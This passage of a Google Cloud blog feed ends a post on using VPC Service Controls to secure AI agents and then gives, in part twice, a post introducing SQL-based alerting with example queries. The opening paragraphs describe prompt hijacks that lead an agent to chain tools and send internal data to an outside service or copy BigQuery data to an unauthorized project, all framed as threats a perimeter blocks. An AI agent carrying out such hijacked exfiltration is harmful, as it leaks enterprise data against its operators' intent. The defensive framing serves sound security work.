&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Guardrail for tool misuse (OWASP ASI02, ASI08)&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: Prompt hijacks can lead agents to chain tools maliciously, such as sending internal directory data to an external service. By enforcing a VPC-SC perimeter around sensitive assets, you prevent misbehaving agents from bridging data across isolated trust zones.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Neutralizing insider threats (OWASP AS103)&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: Attackers can command a data-processing agent to perform a direct cloud-to-cloud copy from a BigQuery dataset to an unauthorized project. While network firewalls see legitimate HTTPS traffic to BigQuery, and IAM sees an authorized service account, VPC-SC evaluates the destination resource. Since the destination project is outside the enterprise perimeter, the system immediately denies the API request.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "&gt;

      
      
        
        &lt;img alt="Pratik&amp;#x27;s blog image (1)" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/Pratiks_blog_image_1.max-1000x1000.jpg" /&gt;
        
        &lt;/a&gt;
      
        &lt;figcaption class="article-image__caption "&gt;&lt;p&gt;VPC Service Controls acts as a perimeter to block data exfiltration attempts from a compromised agent, even if the agent has valid IAM credentials.&lt;/p&gt;&lt;/figcaption&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Data protection for the autonomous agent world&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Perimeter security has evolved from a recommended best practice in the deterministic application and workload centric age to an absolute requirement for the era of autonomous AI agents. VPC-SC provides the necessary control over data movement that IAM cannot address alone. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;In an era where agents interpret prompts as code, VPC-SC becomes the mandatory safety net for enterprise data. Pairing the mapping capability of IAM with the rigid data perimeters of VPC-SC lets organizations securely build agentic innovation while maintaining an absolute guardrail against exfiltration.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;To learn more, you can explore VPC-SC resources &lt;/span&gt;&lt;a href="https://cloud.google.com/security/vpc-service-controls"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;here&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;</content>
    <link href="https://cloud.google.com/blog/products/identity-security/securing-agentic-ai-whats-new-in-vpc-service-controls/" rel="alternate"/>
    <category term="Google Cloud"/>
    <published>2026-06-26T18:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://cloud.google.com/blog/products/management-tools/alert-with-sql-in-cloud-monitoring-observability-analytics</id>
    <title>From query to action: Introducing SQL alerting in Cloud Monitoring Observability Analytics</title>
    <updated>2026-06-26T16:30:00+00:00</updated>
    <content type="html">&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Traditional alerting systems often force a compromise: you can either alert immediately on simple, noisy log events, or monitor rigid, pre-configured metrics that fail when faced with data with many unique answers like user sessions or IP addresses. But the most critical system issues — like a 20% spike in error rates for a specific customer or a latency anomaly correlated with database timeouts — are hidden in the aggregates and relationships between these signals.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Recently, &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/products/management-tools/query-logs-and-traces-with-sql-in-observability-analytics"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;we announced&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; that you can now use SQL to query logs and traces in &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/stackdriver/docs/observability/analytics"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Observability Analytics&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; (formerly Log Analytics). But the story gets better. You can also use SQL to create alerts&lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt; &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;in Observability Analytics. By bringing SQL directly to your alerting engine, you can write complex analytical queries over logs and traces and turn them into alerts. Whether you need to calculate error percentages, analyze high-cardinality dimensions, or JOIN logs and traces, SQL alerting helps you go from basic threshold monitoring to deep, contextual detection that goes beyond the capabilities of traditional alerting systems. SQL alerting is now in preview.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-paragraph_with_image"&gt;&lt;div class="article-module h-c-page"&gt;
  &lt;div class="h-c-grid uni-paragraph-wrap"&gt;
    &lt;div class="uni-paragraph
      h-c-grid__col h-c-grid__col--8 h-c-grid__col-m--6 h-c-grid__col-l--6
      h-c-grid__col--offset-2 h-c-grid__col-m--offset-3 h-c-grid__col-l--offset-3"&gt;

      






  

    &lt;figure class="article-image--wrap-small
      
      "&gt;

      
      
        
        &lt;img alt="image1" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/sql_alert_image_for_blog_post_pEYZzMK.max-1000x1000.png" /&gt;
        
        &lt;/a&gt;
      
    &lt;/figure&gt;

  





      &lt;h3&gt;&lt;b&gt;How SQL-based alerting works&lt;/b&gt;&lt;/h3&gt;&lt;p&gt;SQL alerting in Observability Analytics is available as part of &lt;a href="https://cloud.google.com/monitoring"&gt;Cloud Monitoring&lt;/a&gt;. An alerting policy runs your SQL query on a schedule you define (for example, every 10 minutes). It automatically applies a "lookback window" to your query, so it only analyzes the log entries or trace spans it received since the last time it ran.&lt;/p&gt;&lt;p&gt;If the results of your query meet the condition you set, Cloud Monitoring creates an incident and sends a notification to your chosen channels, like email, Slack, or PagerDuty.&lt;/p&gt;&lt;p&gt;Please note that because SQL-based alerting uses BigQuery to process telemetry data, query executions are billed through BigQuery under your standard on-demand pricing or BigQuery reservations.&lt;/p&gt;&lt;h3&gt;&lt;b&gt;Two ways to trigger an alert&lt;/b&gt;&lt;/h3&gt;&lt;p&gt;You can choose between two types of alert conditions.&lt;/p&gt;&lt;ol&gt;&lt;li&gt;&lt;b&gt;Row count threshold:&lt;/b&gt; This is the simplest option. The alert fires if your query returns a number of rows that is greater than, equal to, or less than a threshold you set. This is perfect for "alert me if more than 10 users have failed logins" scenarios.&lt;/li&gt;&lt;li&gt;&lt;b&gt;Boolean:&lt;/b&gt; This is the most powerful option. The alert fires if your query returns &lt;i&gt;any&lt;/i&gt; row where a specific column you define has a value of true. This lets you build complex logic, like calculating percentages, directly in your SQL query.&lt;/li&gt;&lt;/ol&gt;&lt;p&gt;&lt;b&gt;Example 1: Alerting on payment gateway failures (row count)&lt;/b&gt;&lt;/p&gt;&lt;p&gt;&lt;b&gt;Scenario:&lt;/b&gt; Imagine that you’re an e-commerce operator, and you want to be alerted immediately if your payment gateway is experiencing systemic outages, while ignoring occasional, normal card declines (like an incorrect PIN).&lt;/p&gt;&lt;p&gt;To do this, you can write a query to filter for log entries indicating gateway timeouts, and use a row count threshold to trigger the alert only if the volume of these errors spikes.&lt;/p&gt;
    &lt;/div&gt;
  &lt;/div&gt;
&lt;/div&gt;

&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;quot;SELECT\r\n  JSON_VALUE(json_payload.transaction_id) AS transaction_id,\r\n  JSON_VALUE(json_payload.error_code) AS error_code\r\nFROM\r\n  `my-project-id.my-dataset.my-log-view`\r\nWHERE\r\n  JSON_VALUE(json_payload.status) = &amp;#x27;FAILED&amp;#x27;\r\n  -- Filter for systemic gateway issues, not user-input errors like WRONG_PIN\r\n  AND JSON_VALUE(json_payload.failure_reason) = &amp;#x27;GATEWAY_TIMEOUT&amp;#x27;&amp;quot;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7f8582712160&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Alert configuration:&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;span style="vertical-align: baseline;"&gt;Condition type: Row count threshold&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="vertical-align: baseline;"&gt;Trigger condition: Fired when row counts greater than (&lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;&amp;gt;&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;) 10&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="vertical-align: baseline;"&gt;Evaluation window / lookback: 5 minutes (checks the last 5 minutes of data on your defined schedule)&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Example 2: Alerting on agent latency (traces)&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Scenario: &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;You’re an AI platform engineer, and you want to ensure your multi-step AI agents are responding within acceptable time limits. You want to monitor the 99th percentile (p99) latency of the orchestrator service and get alerted if performance degrades.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;To do this, you can write a SQL query against your trace data that calculates the p99 latency for all services and returns &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;true&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt; if your &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;agent-orchestrator&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt; exceeds 5 seconds (5000 milliseconds).&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;#x27;WITH latency_data AS (\r\n  SELECT\r\n    APPROX_QUANTILES(duration_nano, 100)[OFFSET(99)] / 1000000 AS p99_ms\r\n  FROM\r\n    `my-project-id.us._Trace.Spans._AllSpans`\r\n  WHERE\r\n    -- Examine rows produced by the agent-orchestrator\r\n    JSON_VALUE(resource.attributes, \&amp;#x27;$.&amp;quot;service.name&amp;quot;\&amp;#x27;) = \&amp;#x27;agent-orchestrator\&amp;#x27;\r\n  GROUP BY\r\n    service_name\r\n)\r\nSELECT\r\n  &amp;quot;agent-orchestrator&amp;quot; AS service_name,\r\n  p99_ms,\r\n  -- Boolean logic: Alert if p99 exceeds 5000ms\r\n  (p99_ms &amp;gt; 5000) AS has_latency_spike\r\nFROM\r\n  latency_data&amp;#x27;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7f85827126a0&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Alert configuration:&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Condition type: Boolean&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Target column: &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;has_latency_spike&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Trigger condition: Fired when the query returns any row where this column evaluates to true.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Evaluation window / lookback: 10 minutes (or your preferred scheduling interval)&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Before you begin&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Before you can create a SQL-based alert, you need to set up a few things:&lt;/span&gt;&lt;/p&gt;
&lt;ol&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Analytics enabled:&lt;/strong&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;For &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;logs&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/logging/docs/buckets#upgrade-bucket"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Upgrade&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; your log bucket to use Observability Analytics (if not already updated).&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;For &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;traces&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: Cloud Trace must be collected and stored in your project.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Linked BigQuery dataset:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Create a linked BigQuery dataset for the telemetry source (either the &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/logging/docs/buckets#link-bq-dataset"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;log bucket&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; or the &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/trace/docs/analytics-query-linked-dataset#link-bq-dataset"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;trace dataset&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;). SQL-based alerts query the data through this BigQuery link.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;IAM permissions:&lt;/strong&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Grant the IAM roles necessary to create an SQL-based alert policy: &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/iam/docs/roles-permissions/monitoring#monitoring.alertPolicyEditor"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Monitoring AlertPolicy Editor&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; and &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/iam/docs/roles-permissions/logging#logging.sqlAlertWriter"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Logging SqlAlert Writer&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; (applies to both log and trace alerts).&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Notification channels:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/monitoring/support/notification-options"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Configure the notification channels&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; (like email or Slack) where you want to receive alerts.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;How to create your alert&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Creating a &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/logging/docs/analyze/sql-in-alerting"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;sql-based alert policy&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; is straightforward:&lt;/span&gt;&lt;/p&gt;
&lt;ol&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Navigate to &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;Observability Analytics&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; in the Google Cloud console.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Compose and validate your SQL query.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Select the &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;Run on BigQuery&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; query engine in the UI.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Click the &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;Create alert&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; button from the results toolbar.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Define your condition (row count or boolean) and your evaluation schedule.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Add your notification channels, give your alert a clear name, and click &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;Save&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;For&lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt; &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;Infrastructure as Code (IaC) pipelines, you can also configure alerts via the &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/monitoring/alerts/manage-alerts-terraform"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;API&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; and &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/monitoring/alerts/manage-alerts-terraform"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Terraform&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Get started&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Ready to build more powerful, insightful alerts? Open the &lt;/span&gt;&lt;a href="https://console.cloud.google.com/logs/analytics"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Observability Analytics&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; page in the console and try writing your first SQL query today. You can find more details and advanced examples in the &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/logging/docs/analyze/sql-in-alerting"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;official documentation&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;</content>
    <link href="https://cloud.google.com/blog/products/management-tools/alert-with-sql-in-cloud-monitoring-observability-analytics" rel="alternate"/>
    <category term="Google Cloud"/>
    <published>2026-06-26T16:30:00+00:00</published>
  </entry>
  <entry>
    <id>https://cloud.google.com/blog/products/management-tools/alert-with-sql-in-cloud-monitoring-observability-analytics/</id>
    <title>From query to action: Introducing SQL alerting in Cloud Monitoring Observability Analytics</title>
    <updated>2026-06-26T16:30:00+00:00</updated>
    <content type="html">&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Traditional alerting systems often force a compromise: you can either alert immediately on simple, noisy log events, or monitor rigid, pre-configured metrics that fail when faced with data with many unique answers like user sessions or IP addresses. But the most critical system issues — like a 20% spike in error rates for a specific customer or a latency anomaly correlated with database timeouts — are hidden in the aggregates and relationships between these signals.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Recently, &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/products/management-tools/query-logs-and-traces-with-sql-in-observability-analytics"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;we announced&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; that you can now use SQL to query logs and traces in &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/stackdriver/docs/observability/analytics"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Observability Analytics&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; (formerly Log Analytics). But the story gets better. You can also use SQL to create alerts&lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt; &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;in Observability Analytics. By bringing SQL directly to your alerting engine, you can write complex analytical queries over logs and traces and turn them into alerts. Whether you need to calculate error percentages, analyze high-cardinality dimensions, or JOIN logs and traces, SQL alerting helps you go from basic threshold monitoring to deep, contextual detection that goes beyond the capabilities of traditional alerting systems. SQL alerting is now in preview.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-paragraph_with_image"&gt;&lt;div class="article-module h-c-page"&gt;
  &lt;div class="h-c-grid uni-paragraph-wrap"&gt;
    &lt;div class="uni-paragraph
      h-c-grid__col h-c-grid__col--8 h-c-grid__col-m--6 h-c-grid__col-l--6
      h-c-grid__col--offset-2 h-c-grid__col-m--offset-3 h-c-grid__col-l--offset-3"&gt;

      






  

    &lt;figure class="article-image--wrap-small
      
      "&gt;

      
      
        
        &lt;img alt="image1" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/sql_alert_image_for_blog_post_pEYZzMK.max-1000x1000.png" /&gt;
        
        &lt;/a&gt;
      
    &lt;/figure&gt;

  





      &lt;h3&gt;&lt;b&gt;How SQL-based alerting works&lt;/b&gt;&lt;/h3&gt;&lt;p&gt;SQL alerting in Observability Analytics is available as part of &lt;a href="https://cloud.google.com/monitoring"&gt;Cloud Monitoring&lt;/a&gt;. An alerting policy runs your SQL query on a schedule you define (for example, every 10 minutes). It automatically applies a "lookback window" to your query, so it only analyzes the log entries or trace spans it received since the last time it ran.&lt;/p&gt;&lt;p&gt;If the results of your query meet the condition you set, Cloud Monitoring creates an incident and sends a notification to your chosen channels, like email, Slack, or PagerDuty.&lt;/p&gt;&lt;p&gt;Please note that because SQL-based alerting uses BigQuery to process telemetry data, query executions are billed through BigQuery under your standard on-demand pricing or BigQuery reservations.&lt;/p&gt;&lt;h3&gt;&lt;b&gt;Two ways to trigger an alert&lt;/b&gt;&lt;/h3&gt;&lt;p&gt;You can choose between two types of alert conditions.&lt;/p&gt;&lt;ol&gt;&lt;li&gt;&lt;b&gt;Row count threshold:&lt;/b&gt; This is the simplest option. The alert fires if your query returns a number of rows that is greater than, equal to, or less than a threshold you set. This is perfect for "alert me if more than 10 users have failed logins" scenarios.&lt;/li&gt;&lt;li&gt;&lt;b&gt;Boolean:&lt;/b&gt; This is the most powerful option. The alert fires if your query returns &lt;i&gt;any&lt;/i&gt; row where a specific column you define has a value of true. This lets you build complex logic, like calculating percentages, directly in your SQL query.&lt;/li&gt;&lt;/ol&gt;&lt;p&gt;&lt;b&gt;Example 1: Alerting on payment gateway failures (row count)&lt;/b&gt;&lt;/p&gt;&lt;p&gt;&lt;b&gt;Scenario:&lt;/b&gt; Imagine that you’re an e-commerce operator, and you want to be alerted immediately if your payment gateway is experiencing systemic outages, while ignoring occasional, normal card declines (like an incorrect PIN).&lt;/p&gt;&lt;p&gt;To do this, you can write a query to filter for log entries indicating gateway timeouts, and use a row count threshold to trigger the alert only if the volume of these errors spikes.&lt;/p&gt;
    &lt;/div&gt;
  &lt;/div&gt;
&lt;/div&gt;

&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;quot;SELECT\r\n  JSON_VALUE(json_payload.transaction_id) AS transaction_id,\r\n  JSON_VALUE(json_payload.error_code) AS error_code\r\nFROM\r\n  `my-project-id.my-dataset.my-log-view`\r\nWHERE\r\n  JSON_VALUE(json_payload.status) = &amp;#x27;FAILED&amp;#x27;\r\n  -- Filter for systemic gateway issues, not user-input errors like WRONG_PIN\r\n  AND JSON_VALUE(json_payload.failure_reason) = &amp;#x27;GATEWAY_TIMEOUT&amp;#x27;&amp;quot;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7f36edc4f490&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Alert configuration:&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;span style="vertical-align: baseline;"&gt;Condition type: Row count threshold&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="vertical-align: baseline;"&gt;Trigger condition: Fired when row counts greater than (&lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;&amp;gt;&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;) 10&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="vertical-align: baseline;"&gt;Evaluation window / lookback: 5 minutes (checks the last 5 minutes of data on your defined schedule)&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Example 2: Alerting on agent latency (traces)&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Scenario: &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;You’re an AI platform engineer, and you want to ensure your multi-step AI agents are responding within acceptable time limits. You want to monitor the 99th percentile (p99) latency of the orchestrator service and get alerted if performance degrades.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;To do this, you can write a SQL query against your trace data that calculates the p99 latency for all services and returns &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;true&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt; if your &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;agent-orchestrator&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt; exceeds 5 seconds (5000 milliseconds).&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;#x27;WITH latency_data AS (\r\n  SELECT\r\n    APPROX_QUANTILES(duration_nano, 100)[OFFSET(99)] / 1000000 AS p99_ms\r\n  FROM\r\n    `my-project-id.us._Trace.Spans._AllSpans`\r\n  WHERE\r\n    -- Examine rows produced by the agent-orchestrator\r\n    JSON_VALUE(resource.attributes, \&amp;#x27;$.&amp;quot;service.name&amp;quot;\&amp;#x27;) = \&amp;#x27;agent-orchestrator\&amp;#x27;\r\n  GROUP BY\r\n    service_name\r\n)\r\nSELECT\r\n  &amp;quot;agent-orchestrator&amp;quot; AS service_name,\r\n  p99_ms,\r\n  -- Boolean logic: Alert if p99 exceeds 5000ms\r\n  (p99_ms &amp;gt; 5000) AS has_latency_spike\r\nFROM\r\n  latency_data&amp;#x27;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7f36edc4ff70&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Alert configuration:&lt;/strong&gt;&lt;/p&gt;
